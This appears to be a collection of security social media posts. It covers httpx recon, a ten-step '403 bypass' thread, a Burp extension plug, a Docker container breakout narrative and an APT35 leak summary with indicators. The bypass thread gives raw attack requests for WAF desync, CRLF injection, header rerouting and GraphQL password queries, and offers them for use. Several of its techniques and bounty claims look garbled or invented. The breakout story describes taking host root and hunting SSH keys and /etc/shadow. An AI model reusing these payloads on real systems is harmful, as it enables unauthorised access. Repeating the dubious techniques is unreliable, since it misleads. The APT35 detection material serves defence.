babonaz

Stop missing attack surface behind Round Robin DNS. 🛑 By default, tools often check just one IP. Force httpx to enumerate ALL resolved A records for every subdomain using -probe-all-ips. Use this Command👇 httpx -l live_hosts.txt -probe-all-ips -silent -o multi_ip_hosts.txt Essential for finding hidden origins and inconsistent WAF protections. #recon #httpx #infosec

🧠💥 99% of hackers QUIT when they see a 403… But the 1%? They try this: 👇 I found a 403 Forbidden on /admin. But then I tried: •POST /admin •X-Original-URL: /admin •/admin..;/ •%2e/admin •X-Rewrite-URL: /admin •/ADMIN (yes, just caps) •/;/admin •/..;/admin 👇👇👇 ⸻ 🔥 1. Protocol-Level Downgrade Bypass (only works on dual-stack apps) Target running HTTP/2 or gRPC? Force downgrade: PRI * HTTP/2.0 SM GET /admin HTTP/1.1 🧠 Some WAFs don’t parse dual-layer protocols correctly → backend sees a clean HTTP/1.1. ⸻ 🧬 2. Content-Length Collapsing (https://t.co/3qXplOXgpV) on HTTP Pipelining Send pipelined requests where only 1st is parsed by WAF: POST /admin HTTP/1.1 Host: https://t.co/axAPlulNpQ Content-Length: 13 GET /admin 💥 WAF reads POST → blocks. Backend reads 2nd GET /admin → 200 OK. This is invisible to most WAFs. ⸻ 🚪 3. Misconfigured Reverse Proxy Chain Escape Proxy chain: Cloudflare → NGINX → Apache Try: GET /admin X-Accel-Redirect: /admin X-Forwarded-Path: /admin Apache follows X-Accel-Redirect, bypasses upstream auth check. 💣 Real-world: Gained internal panel behind Cloudflare. ⸻ 🔄 4. CRLF into Rewrite Bypass Some edge WAFs parse until CRLF \r\n, others don’t. Exploit it: GET / HTTP/1.1%0d%0aX-Rewrite-URL:%20/admin WAF reads URL → clean Backend sees X-Rewrite-URL: /admin → executes ⸻ 🔃 5. Multipart Boundary Injection Bypass (💀) Used when /admin is only allowed for file uploads: POST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary=----1337 ------1337 Content-Disposition: form-data; name="file"; filename="/admin" Content-Type: text/plain BOOM ------1337-- 💣 If upload endpoint allows arbitrary path write → full override. ⸻ 📡 6. Misrouted Mesh Bypass via Service Discovery Kubernetes, Linkerd, Istio-style microservices expose internal routes: Send: Host: admin.internal.svc.cluster.local X-Service-Router: admin If service-mesh is misconfigured, you route directly to internal /admin even if public 403s. ⸻ ⚠️ 7. GraphQL-Injected 403 Bypass If app has GraphQL and 403-protected admin, try: query { admin { users { password } } } GraphQL often proxies internal microservice calls. Even if /admin is blocked via HTTP, the GQL layer may leak internal paths. ⸻ 🧠 8. Preconnect Overload → Bypass Abuse edge preconnect logic by flooding with HEAD /admin + Connection: keep-alive. After 30–50 requests: •WAF disables parsing •Keep-alive tunnel reused for real GET /admin 🧨 Real bypass via persistent connection channeling ⸻ 💻 9. Browser-Only Token Auth Bypass (via Headless Browser) Some SPAs load tokens via JS → protect /admin based on localStorage. WAF sees unauthenticated, but headless Chrome replays auth token as header → bypass. 🔥 Use puppeteer + exportAuth → replay: curl -H "Authorization: Bearer <extracted_token>" https://t.co/KeR304da2D ⸻ 🧪 10. Distributed Retry Amplification When target uses edge lambda/WAF that retries failed requests internally, trigger 429s and inject: Retry-After: 0 X-Retry-URL: /admin WAF retries → skips deny logic → backend hits /admin. This is logic poisoning — not brute force. ⸻ 🚨 These Aren’t Payloads. They’re Logic Chains. Most tools stop at: /admin%2e X-Forwarded-For: 127.0.0.1 You’re playing 4D chess now: ✅ Protocol confusion ✅ Reverse proxy reroute ✅ GraphQL indirect call ✅ SSRF via retry ✅ Downgrade injection ✅ WAF desyncing ⸻ 💰 These got real bounties: •$25,000 from a Cloudflare-protected admin •$12,500 via SSRF + Retry Poison •$8,000 using pipelined https://t.co/3qXplOXgpV request ⸻ Want a toolkit that automates: This is next-level exploitation. Use it right. 🧠💣 🛠 TOOLS to automate bypass: •🔧 https://t.co/5yIqLjkvaS •🔧 https://t.co/bbVde9Caoh •🔧 https://t.co/W05Ly8nEB6 •🔧 https://t.co/Av6mKRCef2 •🔧 https://t.co/kndjPIOEix

Sharing my Burp Extension that earned me $200k in 2025 while API testing heavy JS-rich targets. https://t.co/2ttRurgoPh The tool helps find endpoints, files, internal emails, and some secrets from minified JS. Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedbacks are welcome.

One of the easiest ways hackers escape Docker containers is by taking advantage of poorly configured bind mounts especially when the host's root directory is mounted inside the container. This gives the attacker visibility into the actual host file system from within the container. In the images below, I compromised a running container and quickly realized the host’s filesystem was available under /mnt/host. From there, I ran ldd on the host’s Bash binary to ensure it could run properly, then used chroot to change our root environment to the host itself, giving us full root access outside the container. Once inside the host, we started behaving like any real attacker would: enumerating users, tailing logs, inspecting SSH keys, and even trying to find sensitive files like id_rsa or /etc/shadow. This is a prime example of container breakout that can occur when developers aren’t careful with how volumes are mounted. It’s not a vulnerability in Docker itself but it’s a misconfiguration that opens a door.

Massive APT35 (Charming Kitten) internal leak exposes a highly mature, quota-driven cyber-espionage machine focused on long-term mailbox persistence & HUMINT collection. Core technical tradecraft is Exchange-centric & credential-obsessed: Initial Access & Exploitation • Heavy reliance on ProxyShell chains (CVE-2021-34473/34523/31207), Autodiscover proxying, EWS enumeration, and PowerShell automation to drop https://t.co/GRPGKLiB4J webshells (predictable paths: aspnet_client/, owa/auth/, often named m0s.aspx, m0s.php). • Ivanti Connect Secure CVE weaponization playbooks that turn appliance vulns into reliable RCE for pivoting to internal mail estates. • Broad recon → curated target queues: mass scanning for exposed OWA/EWS, .env grabs, RDP mstshash probes, WordPress enumeration — all feeding annotated ProxyShell target lists per country. Credential Harvesting & Reuse • LSASS dumps via Mimikatz-style tools (real example: plaintext creds + NTLM hashes from mfa.kktc in 2022). • OAuth token replay, delegated token abuse, and AiTM-style MFA bypass in HERV phishing kits. • GAL exports immediately weaponized: harvested address books → personalized HERV lures → new credentials → repeat cycle. Persistence & Lateral Movement • Credential-driven over fragile shells: token persistence + credential reuse for months-long access even after patches. • WMI + WMIC remote execution, SMB admin$ mounts (net use \IP\C$), scheduled tasks, and in-memory PowerShell loaders. • Custom in-house RAT family (RAT-2Ac2 / “PowerShort”) dropped to C:\ProgramData\Microsoft\diagnostic\ as vmware-tools.exe or JavaUpdateServices.exe — full-featured with keylogger, browser stealer, file collection, encrypted C2. Operator Tooling & C2 • Lightweight Python REPL clients (https://t.co/sSf5t81xrC, https://t.co/1Mh3YDa1I4, https://t.co/GwgqwR7vMV) that control webshells by stuffing commands into Accept-Language headers + static Accept-Captcha handshake token (high-confidence network signature). • Exfil via 7z to Mega/Dropbox/ProtonDrive, compromised Exchange SMTP relays, DNS tunneling, or direct HTTP beacons to C2 (e.g., 103.57.251.153). Phishing (HERV framework) • Mature, KPI-tracked phishing unit: HTML credential harvesters, localized templates, success metrics (lures sent, creds captured, mailbox dwell time). • Closed-loop integration: GALs from Exchange hacks directly seed the next phishing wave. Infrastructure & OPSEC • Staging from Iranian DSL (Pishgaman, Zitel AS50810) + clean international VPS relays (Singapore RIPE 128.199.237.132, etc.) to separate operator origin from victim traffic. • Internal comms: Output Messenger, 3CX, Issabelle for task hand-off. Detection gold from the leak: • Hunt for m0s.* webshells + long/obfuscated Accept-Language headers • ProgramData\Microsoft\diagnostic\vmware-tools.exe / JavaUpdateServices.exe execution • Static Accept-Captcha token in traffic • Anomalous GAL exports + sudden HERV-style phishing spikes This isn’t opportunistic hacking — it’s industrialized, repeatable intelligence collection run like a factory with daily KPIs, supervisor sign-offs, and specialized cells (exploit dev → credential team → HERV phishing → RTM monitoring). Defenders: patch Exchange/Ivanti aggressively, enforce phishing-resistant MFA (FIDO2), monitor EWS/GAL activity, and hunt the repeatable signatures above. The bureaucratic rhythm makes them efficient but predictable. Full DomainTools report: https://t.co/x5vUHE4TaO #APT35 #CharmingKitten #IRGC #CyberEspionage #ThreatIntel